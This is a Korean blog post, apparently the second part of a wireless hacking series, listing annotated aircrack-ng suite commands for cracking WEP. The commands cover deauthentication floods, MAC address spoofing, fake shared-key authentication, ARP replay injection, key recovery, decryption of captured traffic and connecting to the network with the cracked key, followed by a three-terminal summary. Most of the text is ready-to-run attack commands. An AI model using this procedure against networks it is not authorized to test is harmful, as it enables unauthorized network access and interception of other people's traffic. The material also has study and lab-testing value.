* aireplay-ng -0 5 -a 00:00:00:00:00:00 mon0
- 인증해제(-0) 패킷 5개를 맥주소가 00:00:00:00:00:00인 AP에 보냄
* Filter: wlan.fc.type_subtype == 0x0c
- 인증해제 패킷 필터
* airodump-ng -c 11 -a --bssid 00:00:00:00:00:00 mon0
- AP의 11번 채널(-c)에 연결(-a)된 클라이언트(맥주소) 확인
* macchanger -m aa:aa:aa:aa:aa:aa wlan0
- wlan0의 맥주소를 aa:aa:aa:aa:aa:aa으로 수푸핑
- 비교: ifconfig wlan0 hw ehter aa:aa:aa:aa:aa:aa
* airodump-ng mon0 -c 11 --bssid 00:00:00:00:00:00 -w keystream
- keystream으로 시작하는 파일로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)
- AUTH열이 SKA(Shared Key Authentication)으로 변경되면 캡쳐 성공( WEP 우회가능)
- 비교: -c와 --channel, -w와 --write
* aireplay-ng -1 0 -e binaryU -y keystream~.xor -a [AP맥] -h [공격자맥] mon0
- SSID가 binaryU이고 맥주소가 [AP맥]인 AP에 keystream~.xor을 사용하여 인증 시도
* Filter: wlan.addr == aa:aa:aa:aa:aa:aa
- 송수신 맥주소가 aa:aa:aa:aa:aa:aa인 패킷 필터
* airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0
- WEPCracking으로 시작하는 피알로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)
- #Data열이 10000이상 될 때까지 대기 또는 인젝션 (약 5~10분, WEP 크랙 가능)
* aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0
- 이미 인증된 클라이언트의 맥(aa:aa:aa:aa:aa:aa)으로 ARP응답(-3)을 인젝션
* aircrack-ng WEPCracking-01.cap
- 분석할 패킷이 부족하면 일시중지 후 더 많은 패킷을 기다렸다가 자동으로 재시작
* airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCracking-01.cap
- 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 캡쳐파일 복호화
* tshark -r WEPCracking-01-dec.cap -c 10
- 복호화된 캡쳐파일 WEPCracking-01.cap의 상위 10개 패킷 확인
* iwconfig wlan0 essid "binaryU" key abcdefabcdefabcdefabcdef12
- 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 AP 연결
* dhclient3
- ip 동적 할당 및 dns 동적 설정
** 최종정리 3 터미널 **
===========================================================================
A터미널 : airodump-ng mon0
A터미널 : airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0
B터미널 : aireplay-ng -1 0 -e binaryU -a 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0
B터미널 : aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0
C터미널 : aircrack-ng WEPCracking-01.cap
===========================================================================
'Network' 카테고리의 다른 글
Example of wpa_supplicant configuration file (0) | 2013.01.13 |
---|---|
무선랜 해킹 (3) WPA 크랙 및 연결 (2) | 2012.12.13 |
무선랜 해킹 (1) 무선랜 연결 및 모니터 모드 설정 (0) | 2012.12.13 |
삼성 프린터 SNMP 취약점 (0) | 2012.12.11 |